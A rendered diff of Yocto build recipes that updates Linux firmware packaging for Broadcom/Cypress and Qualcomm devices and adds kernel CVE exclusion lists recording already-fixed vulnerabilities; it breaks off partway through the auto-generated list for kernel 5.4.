630FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.*" 680FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \
681 ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \
682"
631FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin" 683FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin"
632FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin" 684FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin"
633FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.bin" 685FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \
686 ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \
687"
634FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin" 688FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin"
635FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin" 689FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \
690 ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \
691"
636FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin" 692FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin"
637FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \ 693FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \
638 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \ 694 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \
@@ -703,13 +759,22 @@ LICENSE_${PN}-cypress-license = "Firmware-cypress"
703FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress" 759FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress"
704 760
705FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd" 761FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd"
706FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.*" 762FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \
707FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.*" 763 ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*"
708FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.*" 764FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \
709FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin" 765 ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*"
710FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.*" 766FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \
767 ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*"
768FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \
769 ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \
770"
771FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \
772 ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \
773"
711FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \ 774FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \
712 ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \ 775 ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \
776 ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \
777 ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.clm_blob \
713" 778"
714 779
715LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress" 780LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress"
@@ -909,27 +974,100 @@ RDEPENDS_${PN}-qat = "${PN}-qat-license"
909 974
910# For QCOM VPU/GPU and SDM845 975# For QCOM VPU/GPU and SDM845
911LICENSE_${PN}-qcom-license = "Firmware-qcom" 976LICENSE_${PN}-qcom-license = "Firmware-qcom"
977LICENSE_${PN}-qcom-yamato-license = "Firmware-qcom-yamato"
978LICENSE_${PN}-qcom-venus-1.8 = "Firmware-qcom"
979LICENSE_${PN}-qcom-venus-4.2 = "Firmware-qcom"
980LICENSE_${PN}-qcom-venus-5.2 = "Firmware-qcom"
981LICENSE_${PN}-qcom-venus-5.4 = "Firmware-qcom"
982LICENSE_${PN}-qcom-vpu-1.0 = "Firmware-qcom"
983LICENSE_${PN}-qcom-vpu-2.0 = "Firmware-qcom"
984LICENSE_${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
985LICENSE_${PN}-qcom-adreno-a3xx = "Firmware-qcom"
986LICENSE_${PN}-qcom-adreno-a4xx = "Firmware-qcom"
987LICENSE_${PN}-qcom-adreno-a530 = "Firmware-qcom"
988LICENSE_${PN}-qcom-adreno-a630 = "Firmware-qcom"
989LICENSE_${PN}-qcom-adreno-a650 = "Firmware-qcom"
990LICENSE_${PN}-qcom-adreno-a660 = "Firmware-qcom"
991LICENSE_${PN}-qcom-apq8016-modem = "Firmware-qcom"
992LICENSE_${PN}-qcom-apq8016-wifi = "Firmware-qcom"
993LICENSE_${PN}-qcom-apq8096-audio = "Firmware-qcom"
994LICENSE_${PN}-qcom-apq8096-adreno = "Firmware-qcom"
995LICENSE_${PN}-qcom-apq8096-modem = "Firmware-qcom"
996LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom"
997LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
998LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
999LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "Firmware-qcom"
1000LICENSE_${PN}-qcom-sdm845-audio = "Firmware-qcom"
1001LICENSE_${PN}-qcom-sdm845-adreno = "Firmware-qcom"
1002LICENSE_${PN}-qcom-sdm845-compute = "Firmware-qcom"
1003LICENSE_${PN}-qcom-sdm845-modem = "Firmware-qcom"
1004LICENSE_${PN}-qcom-sm8250-audio = "Firmware-qcom"
1005LICENSE_${PN}-qcom-sm8250-adreno = "Firmware-qcom"
1006LICENSE_${PN}-qcom-sm8250-compute = "Firmware-qcom"
1007
912FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt" 1008FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
1009FILES_${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
913FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*" 1010FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
914FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*" 1011FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
915FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*" 1012FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
916FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*" 1013FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
917FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw" 1014FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
918FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*" 1015FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
919FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*" 1016FILES_${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
1017FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a3*_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
1018FILES_${PN}-qcom-adreno-a4xx = "${nonarch_base_libdir}/firmware/qcom/a4*_*.fw"
1019FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
1020FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
1021FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
1022FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
1023FILES_${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
1024FILES_${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
1025FILES_${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
1026FILES_${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
1027FILES_${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
1028FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
1029FILES_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn"
1030FILES_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
1031FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
1032FILES_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
1033FILES_${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
920FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*" 1034FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
921FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*" 1035FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
922FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn" 1036FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
1037FILES_${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
1038FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
1039FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
923RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license" 1040RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
924RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license" 1041RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
925RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license" 1042RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
926RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license" 1043RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
927RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license" 1044RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
1045RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
1046RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license"
1047RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
1048RDEPENDS_${PN}-qcom-adreno-a4xx = "${PN}-qcom-license"
928RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license" 1049RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
929RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license" 1050RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
1051RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
1052RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
1053RDEPENDS_${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
1054RDEPENDS_${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
1055RDEPENDS_${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
1056RDEPENDS_${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
1057RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
1058RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
1059RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
1060RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
930RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license" 1061RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
931RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license" 1062RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
932RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license" 1063RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
1064RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
1065RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
1066
1067RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
1068RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
1069RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
1070RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
933 1071
934FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio" 1072FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio"
935 1073
@@ -958,7 +1096,6 @@ LICENSE_${PN} = "\
958 & Firmware-fw_sst_0f28 \ 1096 & Firmware-fw_sst_0f28 \
959 & Firmware-go7007 \ 1097 & Firmware-go7007 \
960 & Firmware-hfi1_firmware \ 1098 & Firmware-hfi1_firmware \
961 & Firmware-i2400m \
962 & Firmware-ibt_firmware \ 1099 & Firmware-ibt_firmware \
963 & Firmware-it913x \ 1100 & Firmware-it913x \
964 & Firmware-IntcSST2 \ 1101 & Firmware-IntcSST2 \
@@ -979,7 +1116,6 @@ LICENSE_${PN} = "\
979 & Firmware-ralink-firmware \ 1116 & Firmware-ralink-firmware \
980 & Firmware-imx-sdma_firmware \ 1117 & Firmware-imx-sdma_firmware \
981 & Firmware-siano \ 1118 & Firmware-siano \
982 & Firmware-tda7706-firmware \
983 & Firmware-ti-connectivity \ 1119 & Firmware-ti-connectivity \
984 & Firmware-ti-keystone \ 1120 & Firmware-ti-keystone \
985 & Firmware-ueagle-atm4-firmware \ 1121 & Firmware-ueagle-atm4-firmware \
@@ -1012,3 +1148,6 @@ python populate_packages_prepend () {
1012# Firmware files are generally not ran on the CPU, so they can be 1148# Firmware files are generally not ran on the CPU, so they can be
1013# allarch despite being architecture specific 1149# allarch despite being architecture specific
1014INSANE_SKIP = "arch" 1150INSANE_SKIP = "arch"
1151
1152# Don't warn about already stripped files
1153INSANE_SKIP:${PN} = "already-stripped"
diff --git a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
index 4ad74a27e9..2d4429b6b4 100644
--- a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
+++ b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
@@ -1,4 +1,6 @@
1SUMMARY = "Sanitized set of kernel headers for the C library's use" 1SUMMARY = "Sanitized set of kernel headers for the C library's use"
2HOMEPAGE = "https://www.kernel.org/"
3DESCRIPTION = "Designed to maintain an Application Programming Interface (API) stable version of the Linux headers"
2SECTION = "devel" 4SECTION = "devel"
3LICENSE = "GPLv2" 5LICENSE = "GPLv2"
4 6
diff --git a/meta/recipes-kernel/linux/cve-exclusion.inc b/meta/recipes-kernel/linux/cve-exclusion.inc
new file mode 100644
index 0000000000..efc8b09475
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion.inc
@@ -0,0 +1,13 @@
1# Kernel CVE exclusion file
2
3# https://nvd.nist.gov/vuln/detail/CVE-2020-29373
4# Patched in kernel since v5.6 ff002b30181d30cdfbca316dadd099c3ca0d739c
5# Backported in version v5.4.24 cac68d12c531aa3010509a5a55a5dfd18dedaa80
6CVE_CHECK_WHITELIST += "CVE-2020-29373"
7
8# https://nvd.nist.gov/vuln/detail/CVE-2022-39188
9# Patched in kernel since v5.19 b67fbebd4cf980aecbcc750e1462128bffe8ae15
10# Backported in version v5.4.212 c9c5501e815132530d741ec9fdd22657f91656bc
11# Backported in version v5.10.141 895428ee124ad70b9763259308354877b725c31d
12# Backported in version v5.15.65 3ffb97fce282df03723995f5eed6a559d008078e
13CVE_CHECK_WHITELIST += "CVE-2022-39188"
diff --git a/meta/recipes-kernel/linux/cve-exclusion_5.4.inc b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
new file mode 100644
index 0000000000..b0b33bcc1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
@@ -0,0 +1,9445 @@
1
2# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
3# Generated at 2024-04-14 04:45:05.585211 for version 5.4.273
4
5python check_kernel_cve_status_version() {
6 this_version = "5.4.273"
7 kernel_version = d.getVar("LINUX_VERSION")
8 if kernel_version != this_version:
9 bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
10}
11do_cve_check[prefuncs] += "check_kernel_cve_status_version"
12
13# fixed-version: Fixed after version 2.6.12rc2
14CVE_CHECK_WHITELIST += "CVE-2003-1604"
15
16# fixed-version: Fixed after version 3.6rc1
17CVE_CHECK_WHITELIST += "CVE-2004-0230"
18
19# CVE-2005-3660 has no known resolution
20
21# fixed-version: Fixed after version 2.6.26rc5
22CVE_CHECK_WHITELIST += "CVE-2006-3635"
23
24# fixed-version: Fixed after version 2.6.19rc3
25CVE_CHECK_WHITELIST += "CVE-2006-5331"
26
27# fixed-version: Fixed after version 2.6.19rc2
28CVE_CHECK_WHITELIST += "CVE-2006-6128"
29
30# CVE-2007-3719 has no known resolution
31
32# fixed-version: Fixed after version 2.6.12rc2
33CVE_CHECK_WHITELIST += "CVE-2007-4774"
34
35# fixed-version: Fixed after version 2.6.24rc6
36CVE_CHECK_WHITELIST += "CVE-2007-6761"
37
38# fixed-version: Fixed after version 2.6.20rc5
39CVE_CHECK_WHITELIST += "CVE-2007-6762"
40
41# CVE-2008-2544 has no known resolution
42
43# CVE-2008-4609 has no known resolution
44
45# fixed-version: Fixed after version 2.6.25rc1
46CVE_CHECK_WHITELIST += "CVE-2008-7316"
47
48# fixed-version: Fixed after version 2.6.31rc6
49CVE_CHECK_WHITELIST += "CVE-2009-2692"
50
51# fixed-version: Fixed after version 2.6.23rc9
52CVE_CHECK_WHITELIST += "CVE-2010-0008"
53
54# fixed-version: Fixed after version 2.6.36rc5
55CVE_CHECK_WHITELIST += "CVE-2010-3432"
56
57# CVE-2010-4563 has no known resolution
58
59# fixed-version: Fixed after version 2.6.37rc6
60CVE_CHECK_WHITELIST += "CVE-2010-4648"
61
62# fixed-version: Fixed after version 2.6.38rc1
63CVE_CHECK_WHITELIST += "CVE-2010-5313"
64
65# CVE-2010-5321 has no known resolution
66
67# fixed-version: Fixed after version 2.6.35rc1
68CVE_CHECK_WHITELIST += "CVE-2010-5328"
69
70# fixed-version: Fixed after version 2.6.39rc1
71CVE_CHECK_WHITELIST += "CVE-2010-5329"
72
73# fixed-version: Fixed after version 2.6.34rc7
74CVE_CHECK_WHITELIST += "CVE-2010-5331"
75
76# fixed-version: Fixed after version 2.6.37rc1
77CVE_CHECK_WHITELIST += "CVE-2010-5332"
78
79# fixed-version: Fixed after version 3.2rc1
80CVE_CHECK_WHITELIST += "CVE-2011-4098"
81
82# fixed-version: Fixed after version 3.3rc1
83CVE_CHECK_WHITELIST += "CVE-2011-4131"
84
85# fixed-version: Fixed after version 3.2rc1
86CVE_CHECK_WHITELIST += "CVE-2011-4915"
87
88# CVE-2011-4916 has no known resolution
89
90# CVE-2011-4917 has no known resolution
91
92# fixed-version: Fixed after version 3.2rc1
93CVE_CHECK_WHITELIST += "CVE-2011-5321"
94
95# fixed-version: Fixed after version 3.1rc1
96CVE_CHECK_WHITELIST += "CVE-2011-5327"
97
98# fixed-version: Fixed after version 3.7rc2
99CVE_CHECK_WHITELIST += "CVE-2012-0957"
100
101# fixed-version: Fixed after version 3.5rc1
102CVE_CHECK_WHITELIST += "CVE-2012-2119"
103
104# fixed-version: Fixed after version 3.5rc1
105CVE_CHECK_WHITELIST += "CVE-2012-2136"
106
107# fixed-version: Fixed after version 3.5rc2
108CVE_CHECK_WHITELIST += "CVE-2012-2137"
109
110# fixed-version: Fixed after version 3.4rc6
111CVE_CHECK_WHITELIST += "CVE-2012-2313"
112
113# fixed-version: Fixed after version 3.4rc6
114CVE_CHECK_WHITELIST += "CVE-2012-2319"
115
116# fixed-version: Fixed after version 3.13rc4
117CVE_CHECK_WHITELIST += "CVE-2012-2372"
118
119# fixed-version: Fixed after version 3.4rc1
120CVE_CHECK_WHITELIST += "CVE-2012-2375"
121
122# fixed-version: Fixed after version 3.5rc1
123CVE_CHECK_WHITELIST += "CVE-2012-2390"
124
125# fixed-version: Fixed after version 3.5rc4
126CVE_CHECK_WHITELIST += "CVE-2012-2669"
127
128# fixed-version: Fixed after version 2.6.34rc1
129CVE_CHECK_WHITELIST += "CVE-2012-2744"
130
131# fixed-version: Fixed after version 3.4rc3
132CVE_CHECK_WHITELIST += "CVE-2012-2745"
133
134# fixed-version: Fixed after version 3.5rc6
135CVE_CHECK_WHITELIST += "CVE-2012-3364"
136
137# fixed-version: Fixed after version 3.4rc5
138CVE_CHECK_WHITELIST += "CVE-2012-3375"
139
140# fixed-version: Fixed after version 3.5rc5
141CVE_CHECK_WHITELIST += "CVE-2012-3400"
142
143# fixed-version: Fixed after version 3.6rc2
144CVE_CHECK_WHITELIST += "CVE-2012-3412"
145
146# fixed-version: Fixed after version 3.6rc1
147CVE_CHECK_WHITELIST += "CVE-2012-3430"
148
149# fixed-version: Fixed after version 2.6.19rc4
150CVE_CHECK_WHITELIST += "CVE-2012-3510"
151
152# fixed-version: Fixed after version 3.5rc6
153CVE_CHECK_WHITELIST += "CVE-2012-3511"
154
155# fixed-version: Fixed after version 3.6rc3
156CVE_CHECK_WHITELIST += "CVE-2012-3520"
157
158# fixed-version: Fixed after version 3.0rc1
159CVE_CHECK_WHITELIST += "CVE-2012-3552"
160
161# Skipping CVE-2012-4220, no affected_versions
162
163# Skipping CVE-2012-4221, no affected_versions
164
165# Skipping CVE-2012-4222, no affected_versions
166
167# fixed-version: Fixed after version 3.4rc1
168CVE_CHECK_WHITELIST += "CVE-2012-4398"
169
170# fixed-version: Fixed after version 2.6.36rc4
171CVE_CHECK_WHITELIST += "CVE-2012-4444"
172
173# fixed-version: Fixed after version 3.7rc6
174CVE_CHECK_WHITELIST += "CVE-2012-4461"
175
176# fixed-version: Fixed after version 3.6rc5
177CVE_CHECK_WHITELIST += "CVE-2012-4467"
178
179# fixed-version: Fixed after version 3.7rc3
180CVE_CHECK_WHITELIST += "CVE-2012-4508"
181
182# fixed-version: Fixed after version 3.8rc1
183CVE_CHECK_WHITELIST += "CVE-2012-4530"
184
185# CVE-2012-4542 has no known resolution
186
187# fixed-version: Fixed after version 3.7rc4
188CVE_CHECK_WHITELIST += "CVE-2012-4565"
189
190# fixed-version: Fixed after version 3.8rc1
191CVE_CHECK_WHITELIST += "CVE-2012-5374"
192
193# fixed-version: Fixed after version 3.8rc1
194CVE_CHECK_WHITELIST += "CVE-2012-5375"
195
196# fixed-version: Fixed after version 3.6rc1
197CVE_CHECK_WHITELIST += "CVE-2012-5517"
198
199# fixed-version: Fixed after version 3.6rc7
200CVE_CHECK_WHITELIST += "CVE-2012-6536"
201
202# fixed-version: Fixed after version 3.6rc7
203CVE_CHECK_WHITELIST += "CVE-2012-6537"
204
205# fixed-version: Fixed after version 3.6rc7
206CVE_CHECK_WHITELIST += "CVE-2012-6538"
207
208# fixed-version: Fixed after version 3.6rc3
209CVE_CHECK_WHITELIST += "CVE-2012-6539"
210
211# fixed-version: Fixed after version 3.6rc3
212CVE_CHECK_WHITELIST += "CVE-2012-6540"
213
214# fixed-version: Fixed after version 3.6rc3
215CVE_CHECK_WHITELIST += "CVE-2012-6541"
216
217# fixed-version: Fixed after version 3.6rc3
218CVE_CHECK_WHITELIST += "CVE-2012-6542"
219
220# fixed-version: Fixed after version 3.6rc3
221CVE_CHECK_WHITELIST += "CVE-2012-6543"
222
223# fixed-version: Fixed after version 3.6rc3
224CVE_CHECK_WHITELIST += "CVE-2012-6544"
225
226# fixed-version: Fixed after version 3.6rc3
227CVE_CHECK_WHITELIST += "CVE-2012-6545"
228
229# fixed-version: Fixed after version 3.6rc3
230CVE_CHECK_WHITELIST += "CVE-2012-6546"
231
232# fixed-version: Fixed after version 3.6rc1
233CVE_CHECK_WHITELIST += "CVE-2012-6547"
234
235# fixed-version: Fixed after version 3.6rc1
236CVE_CHECK_WHITELIST += "CVE-2012-6548"
237
238# fixed-version: Fixed after version 3.6rc1
239CVE_CHECK_WHITELIST += "CVE-2012-6549"
240
241# fixed-version: Fixed after version 3.3rc1
242CVE_CHECK_WHITELIST += "CVE-2012-6638"
243
244# fixed-version: Fixed after version 3.6rc2
245CVE_CHECK_WHITELIST += "CVE-2012-6647"
246
247# fixed-version: Fixed after version 3.6
248CVE_CHECK_WHITELIST += "CVE-2012-6657"
249
250# fixed-version: Fixed after version 3.6rc5
251CVE_CHECK_WHITELIST += "CVE-2012-6689"
252
253# fixed-version: Fixed after version 3.5rc1
254CVE_CHECK_WHITELIST += "CVE-2012-6701"
255
256# fixed-version: Fixed after version 3.7rc1
257CVE_CHECK_WHITELIST += "CVE-2012-6703"
258
259# fixed-version: Fixed after version 3.5rc1
260CVE_CHECK_WHITELIST += "CVE-2012-6704"
261
262# fixed-version: Fixed after version 3.4rc1
263CVE_CHECK_WHITELIST += "CVE-2012-6712"
264
265# fixed-version: Fixed after version 3.9rc1
